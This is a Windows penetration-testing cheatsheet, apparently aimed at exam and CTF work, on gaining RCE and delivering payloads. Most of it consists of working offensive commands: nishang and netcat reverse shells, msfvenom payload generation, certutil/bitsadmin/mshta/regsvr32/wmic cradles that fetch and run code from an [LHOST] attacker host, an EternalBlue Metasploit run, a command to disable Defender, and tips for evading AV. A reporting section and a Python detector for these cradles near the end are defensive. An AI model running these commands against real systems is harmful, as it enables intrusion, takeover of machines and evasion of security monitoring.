🛡️ Methodology Checklist

  • Identify the RCE vector: exploit, command injection, webshell, file upload
  • PowerShell reverse shell: download and execute nishang's Invoke-PowerShellTcp in memory
  • Or drop and execute an msfvenom EXE payload
  • Netcat for Windows: upload nc.exe, then nc.exe [LHOST] [LPORT] -e cmd.exe
  • PowerShell one-liner (nishang, not a Metasploit module): IEX (IWR 'http://[LHOST]/Invoke-PowerShellTcp.ps1' -UseBasicParsing); Invoke-PowerShellTcp -Reverse -IPAddress [LHOST] -Port [LPORT]
  • Start the listener before triggering the payload, then catch the shell
  • If you land in Meterpreter, migrate to a stable, long-lived process before post-ex

🎯 Operational Context

Use when: Delivering a payload to a Windows target. Choose the transport by which built-in binaries are available: certutil, PowerShell IWR/WebClient, an SMB share, MSHTA, regsvr32. Think Dumber First: certutil -urlcache -split -f http://[LHOST]/shell.exe C:\Windows\Temp\s.exe is present on every Windows build, but the -urlcache download pattern is flagged by current Defender and most EDRs, so count on it only against unmanaged hosts. If that fails, PowerShell -c (New-Object Net.WebClient).DownloadFile('http://[LHOST]/shell.exe','C:\Temp\s.exe') (the destination directory must already exist and be writable). Skip when: AppLocker/WDAC blocks unsigned executables. The download itself will succeed but the EXE will not run, so pivot to LOL techniques (regsvr32 scriptlets, mshta, wmic /format) that run script inside a signed host process without writing an EXE. Note that wmic.exe is deprecated and no longer installed by default on recent Windows 11 builds.


⚡ Tactical Cheatsheet

Command | Tactical Outcome
ping [TARGET_IP] | Check TTL: ~128 = Windows, ~64 = Linux (minus one per router hop)
sudo nmap -v -O [TARGET_IP] | OS detection via TCP/IP stack fingerprinting
sudo nmap -sC -sV [TARGET_IP] | Service version scan + default scripts
use auxiliary/scanner/smb/smb_ms17_010 | Scan for EternalBlue (MS17-010) vulnerability
use exploit/windows/smb/ms17_010_psexec | Exploit MS17-010 (stable psexec variant; needs an accessible named pipe)
set RHOSTS [TARGET_IP]; set LHOST tun0; exploit | Run the MS17-010 exploit
use exploit/windows/smb/psexec | Authenticated RCE via PsExec (requires local admin creds or NTLM hash)
msfvenom -p windows/shell_reverse_tcp LHOST=[LHOST] LPORT=443 -f exe > shell.exe | Generate a 32-bit Windows reverse shell EXE (LHOST is your listener, not the target)
msfvenom -p windows/x64/shell_reverse_tcp LHOST=[LHOST] LPORT=443 -f aspx -o shell.aspx | IIS ASPX reverse shell (64-bit)
IEX(New-Object Net.WebClient).DownloadString('http://[LHOST]/shell.ps1') | Fileless PowerShell payload delivery (script served from your host)
Set-MpPreference -DisableRealtimeMonitoring $true | Disable Defender real-time scanning (lab only; needs local admin and fails when Tamper Protection is on)

🔬 Deep Dive & Workflow

Critical Windows Vulnerabilities (Exam/CTF Reference)

Vulnerability | CVE / Bulletin | Attack Surface | Impact
MS08-067 | CVE-2008-4250 / MS08-067 | SMB (Server service NetAPI path canonicalisation); used by Conficker and Stuxnet | RCE
EternalBlue | CVE-2017-0144 / MS17-010 | SMBv1; WannaCry/NotPetya | RCE / SYSTEM
BlueKeep | CVE-2019-0708 | RDP, pre-auth, Windows 2000 through Server 2008 R2 | RCE
PrintNightmare | CVE-2021-1675 / CVE-2021-34527 | Print Spooler, remote driver installation | RCE / SYSTEM
SIGRed | CVE-2020-1350 | DNS SIG record parsing in the Windows DNS Server role on a DC | Domain Admin
Zerologon | CVE-2020-1472 | Netlogon cryptographic flaw (AES-CFB8 with zero IV) | Domain Admin
SeriousSAM / HiveNightmare | CVE-2021-36934 | SAM/SYSTEM hive ACLs let non-admins read them via VSS shadow copies | Credential Dump

OS Fingerprinting Techniques

  1. TTL ping: Windows ≈ 128, Linux ≈ 64, and each router hop subtracts one (ping [TARGET_IP])
  2. Nmap OS detection: sudo nmap -v -O [TARGET_IP], look for cpe:/o:microsoft:windows_* in the output
  3. Banner grabbing: IIS version headers, SMB and RDP banners reveal the Windows version
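The TTL technique from step 1 with the hop correction carried through, as an added example that is not part of the original cheatsheet: it parses Linux- and Windows-style ping output, picks the most common TTL, rounds it up to the nearest default (64, 128, 255) and reports the implied hop count. The ping transcripts and the 10.10.10.x addresses are constructed for the example.

```python
"""Guess a host's OS family from the TTL in a ping reply.

Added example, not code from the original cheatsheet. Default initial
TTLs are 128 for Windows, 64 for Linux/BSD/macOS and 255 for Cisco IOS
and Solaris; each router on the path decrements the value by one, so a
reply showing 127 almost certainly came from a Windows host one hop
away. classify_ttl rounds the observed value up to the nearest default
and reports the implied hop count. Caveats: an administrator can change
the default TTL, and NAT devices or load balancers in the path may
rewrite it, so treat the result as a hint to confirm with nmap -O or a
service banner.
"""
import re

# Default initial TTL -> OS family.
INITIAL_TTLS = {64: "Linux/Unix", 128: "Windows", 255: "Cisco/Solaris"}

# Matches "ttl=127" (Linux ping) and "TTL=63" (Windows ping).
_TTL_RE = re.compile(r"\bttl=(\d+)", re.IGNORECASE)


def classify_ttl(observed):
    """Return (os_family, estimated_hops) for one observed TTL value.

    The smallest default that is >= observed wins: 1..64 is Linux/Unix,
    65..128 is Windows, 129..255 is Cisco/Solaris. A Windows host more
    than 64 hops away would be misread as Linux, which does not happen
    in practice.
    """
    if not 0 < observed <= 255:
        raise ValueError(f"TTL out of range: {observed}")
    for initial in sorted(INITIAL_TTLS):
        if observed <= initial:
            return INITIAL_TTLS[initial], initial - observed
    raise AssertionError("unreachable: 255 is the largest default")


def parse_ping_ttls(text):
    """Extract every TTL value from raw ping output."""
    return [int(v) for v in _TTL_RE.findall(text)]


def fingerprint_from_ping(text):
    """Classify using the most common TTL in a ping transcript; None if no replies."""
    ttls = parse_ping_ttls(text)
    if not ttls:
        return None
    ttl = max(set(ttls), key=ttls.count)  # ignore a stray reply with a different TTL
    os_family, hops = classify_ttl(ttl)
    return {"ttl": ttl, "os": os_family, "hops": hops}


# Constructed transcripts (not real captures): Linux ping against a Windows
# target one VPN hop away, and Windows ping against a Linux target one hop away.
SAMPLE_LINUX_PING_TO_WINDOWS = """\
PING 10.10.10.40 (10.10.10.40) 56(84) bytes of data.
64 bytes from 10.10.10.40: icmp_seq=1 ttl=127 time=45.2 ms
64 bytes from 10.10.10.40: icmp_seq=2 ttl=127 time=44.8 ms
"""
SAMPLE_WINDOWS_PING_TO_LINUX = """\
Reply from 10.10.10.3: bytes=32 time=38ms TTL=63
Reply from 10.10.10.3: bytes=32 time=39ms TTL=63
"""

if __name__ == "__main__":
    for name, text in [("linux->windows", SAMPLE_LINUX_PING_TO_WINDOWS),
                       ("windows->linux", SAMPLE_WINDOWS_PING_TO_LINUX)]:
        print(name, fingerprint_from_ping(text))
```

Pipe real output in with `ping -c 3 target | python3 ttl.py` style plumbing or call fingerprint_from_ping on the captured text; a hop count that disagrees with traceroute is the first sign that something in the path is rewriting TTLs.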

Windows Payload Types

Format | Tool | Use Case
.exe | MSFvenom | Direct execution after dropping to disk
.ps1 | Nishang | Fileless via an IEX download cradle
.bat | Manual | Simple automation, very basic
.msi | MSFvenom | msiexec /quiet /i; runs elevated when AlwaysInstallElevated is set
.dll | Custom | DLL hijacking / injection
.aspx | MSFvenom | IIS web server RCE via file upload

CMD vs PowerShell — When to Use Which

Feature | CMD | PowerShell
Command logging | None natively (only process-creation auditing or Sysmon records the command line) | Script Block, Module and Transcription logging when enabled
Execution restrictions | None | Execution Policy (trivially bypassed) and AMSI (not trivial)
Availability | All versions, including XP | Built in from Windows 7 / Server 2008 R2 (a separate download for XP and 2003)
Best for | Stealth: fewer logs, though 4688 with command-line auditing still captures it | Complex post-ex scripts
Identify by prompt | C:\Windows\system32> | PS C:\Windows\system32>

WSL and PowerShell Core — Blind Spots

  • WSL 2 runs in a lightweight VM with its own virtual NIC: on builds before Microsoft wired the Hyper-V firewall into WSL (recent Windows 11), its traffic is not filtered by the host Windows Firewall, and Defender real-time scanning does not cover the Linux root filesystem by default. Python/Linux tooling inside WSL can therefore fetch and stage payloads with much less host visibility. This is reduced visibility, not invisibility: the traffic still leaves the physical NIC, so network sensors see it.
  • PowerShell Core (pwsh) on Linux keeps most of the same cmdlets, but AMSI exists only on Windows and Linux EDR coverage of pwsh is typically thin, so a cradle that trips AMSI on Windows may run unnoticed there.

EternalBlue Quick Run

use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS [TARGET_IP]
run
# If "likely VULNERABLE" (the scanner also lists any accessible named pipes):
use exploit/windows/smb/ms17_010_psexec
set RHOSTS [TARGET_IP]; set LHOST tun0
set payload windows/meterpreter/reverse_tcp
# use windows/x64/meterpreter/reverse_tcp for a 64-bit target
exploit
# If ms17_010_psexec fails because no named pipe is reachable, fall back to
# exploit/windows/smb/ms17_010_eternalblue (less stable; can crash the target)

🛠️ Troubleshooting & Edge Cases

Problem | Cause | Fix
certutil download blocked by AV | certutil.exe -urlcache flagged by Defender/EDR | Use bitsadmin /transfer job /download /priority high http://[LHOST]/shell.exe C:\Temp\s.exe (bitsadmin needs an absolute local path and the directory must exist)
PowerShell IWR returns 403 | Server-side filtering by User-Agent | Add -UserAgent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)'
SMB file share not accessible from target | Outbound TCP 445 blocked | Use HTTP delivery; or a WebDAV UNC path \\[LHOST]@80\share\shell.exe (requires the WebClient service running on the target)
Downloaded EXE flagged on write | Real-time AV scans the file as it lands on disk | Deliver shellcode via reflective loading or in-memory PowerShell execution so nothing touches disk
regsvr32 COM scriptlet blocked | AppLocker/WDAC rule for regsvr32 | Try mshta http://[LHOST]/payload.hta or wmic os get /format:"http://[LHOST]/payload.xsl" (wmic is absent from recent Windows 11 builds)

📝 Reporting Trigger

Finding Title: Windows Payload Delivery via Built-In LOL Binaries
Impact: Signed Microsoft binaries (certutil, bitsadmin, mshta, regsvr32, wmic) fetched and executed attacker-controlled code under a trusted process context. mshta, regsvr32 and wmic ran remote script without writing an EXE to disk; certutil and bitsadmin did write a payload, but through tools whose use blends with legitimate administration, so the downloads were not flagged.
Root Cause: Default AppLocker/WDAC policies allow everything under C:\Windows, so these binaries are implicitly trusted, and no behavioral monitoring existed for their outbound network connections or command lines.
Recommendation: Apply Microsoft's recommended WDAC block list for abusable LOLBins (it includes mshta.exe and wmic.exe) or equivalent AppLocker deny rules; add outbound Windows Firewall rules so certutil, bitsadmin, mshta and regsvr32 cannot reach the network; alert on process-creation events (Sysmon Event ID 1, or Security 4688 with command-line auditing) showing certutil -urlcache, bitsadmin /transfer, or mshta/regsvr32 with a URL argument; enable PowerShell Script Block Logging (Event ID 4104) to capture download cradles, including ones hidden behind -EncodedCommand.
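The process-creation detection recommended above, written out as an added example that is not part of the original cheatsheet and not a product rule set: it scans the CommandLine field of Sysmon Event ID 1 / Security 4688-style records for every delivery primitive in this page's cheatsheet and troubleshooting table (certutil -urlcache, bitsadmin /transfer, mshta with a remote target, regsvr32 scriptlets, wmic /format XSL, PowerShell download cradles) and unwraps -EncodedCommand so a base64-hidden cradle is caught too. The "Key=Value" log format, the 10.10.14.5 host and all paths are constructed for the example.

```python
"""Flag LOLBin download cradles in process-creation command lines.

Added example, not code from the original cheatsheet. Rules run against
the CommandLine field only; the surrounding "Image=... CommandLine=..."
log format and every host, IP and path below are constructed for the
example, not real telemetry.
"""
import base64
import re

# One regex per delivery primitive listed on this page.
LOLBIN_RULES = [
    ("certutil_urlcache", re.compile(r"certutil(?:\.exe)?\b.*\s-urlcache\b", re.I)),
    ("bitsadmin_transfer", re.compile(r"bitsadmin(?:\.exe)?\b.*\s/transfer\b", re.I)),
    ("mshta_remote", re.compile(r"mshta(?:\.exe)?\b.*(?:https?://|vbscript:|javascript:)", re.I)),
    ("regsvr32_scriptlet", re.compile(r"regsvr32(?:\.exe)?\b.*/i:https?://", re.I)),
    ("wmic_xsl", re.compile(r"wmic(?:\.exe)?\b.*/format:\"?https?://", re.I)),
]
# PowerShell is split into host + primitive because the primitive may only
# become visible after -EncodedCommand is decoded.
_PS_HOST_RE = re.compile(r"\b(?:powershell|pwsh)(?:\.exe)?\b", re.I)
_CRADLE_RE = re.compile(
    r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient|Start-BitsTransfer",
    re.I,
)
# powershell.exe accepts any unambiguous prefix of -EncodedCommand.
_ENC_RE = re.compile(r"\s-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
_URL_RE = re.compile(r"https?://[^\s\"')]+")
_IMAGE_RE = re.compile(r"Image=(\S+)")
_CMDLINE_RE = re.compile(r"CommandLine=(.*)$")


def decode_encoded_command(cmd):
    """Return the script hidden behind -EncodedCommand, or None if absent or undecodable."""
    m = _ENC_RE.search(cmd)
    if not m:
        return None
    try:
        # PowerShell expects base64 over UTF-16LE text.
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def scan_command_line(cmd):
    """Return the sorted list of rule names that fire on one command line."""
    hits = {name for name, rx in LOLBIN_RULES if rx.search(cmd)}
    if _PS_HOST_RE.search(cmd):
        if _CRADLE_RE.search(cmd):
            hits.add("powershell_cradle")
        decoded = decode_encoded_command(cmd)
        if decoded is not None:
            hits.add("powershell_encoded")
            if _CRADLE_RE.search(decoded):
                hits.add("powershell_cradle")
    return sorted(hits)


def scan_events(lines):
    """Scan log lines; return one finding per line that matched at least one rule."""
    findings = []
    for index, line in enumerate(lines):
        m = _CMDLINE_RE.search(line)
        if not m:
            continue
        cmd = m.group(1)
        rules = scan_command_line(cmd)
        if not rules:
            continue
        decoded = decode_encoded_command(cmd) or ""
        image = _IMAGE_RE.search(line)
        findings.append({
            "index": index,
            "image": image.group(1) if image else None,
            "rules": rules,
            # URLs from the raw line and from the decoded script, de-duplicated.
            "urls": sorted(set(_URL_RE.findall(cmd) + _URL_RE.findall(decoded))),
        })
    return findings


# Constructed sample events (not real telemetry). The last two are benign.
_ENCODED_CRADLE = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.5/shell.ps1')".encode("utf-16-le")
).decode()
SAMPLE_EVENTS = [
    r"Image=C:\Windows\System32\certutil.exe CommandLine=certutil -urlcache -split -f http://10.10.14.5/shell.exe C:\Windows\Temp\s.exe",
    r"Image=C:\Windows\System32\bitsadmin.exe CommandLine=bitsadmin /transfer job /download /priority high http://10.10.14.5/shell.exe C:\Temp\s.exe",
    r"Image=C:\Windows\System32\mshta.exe CommandLine=mshta http://10.10.14.5/payload.hta",
    r"Image=C:\Windows\System32\regsvr32.exe CommandLine=regsvr32 /s /n /u /i:http://10.10.14.5/file.sct scrobj.dll",
    r'Image=C:\Windows\System32\wbem\WMIC.exe CommandLine=wmic os get /format:"http://10.10.14.5/payload.xsl"',
    r"Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe CommandLine=powershell -c IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.5/shell.ps1')",
    r"Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe CommandLine=powershell -nop -w hidden -enc " + _ENCODED_CRADLE,
    r"Image=C:\Windows\System32\certutil.exe CommandLine=certutil -hashfile C:\Temp\installer.msi SHA256",
    r"Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe CommandLine=powershell -NoProfile -Command Get-Service Spooler",
]

if __name__ == "__main__":
    for f in scan_events(SAMPLE_EVENTS):
        print(f"event {f['index']}: {', '.join(f['rules'])} -> {f['urls']}")
```

The two benign lines are there on purpose: certutil -hashfile and a plain Get-Service must not fire, because a rule that alerts on every certutil or powershell launch gets muted within a week. Extracting the URL from the decoded script is what turns a 4688 hit into something a responder can block at the proxy.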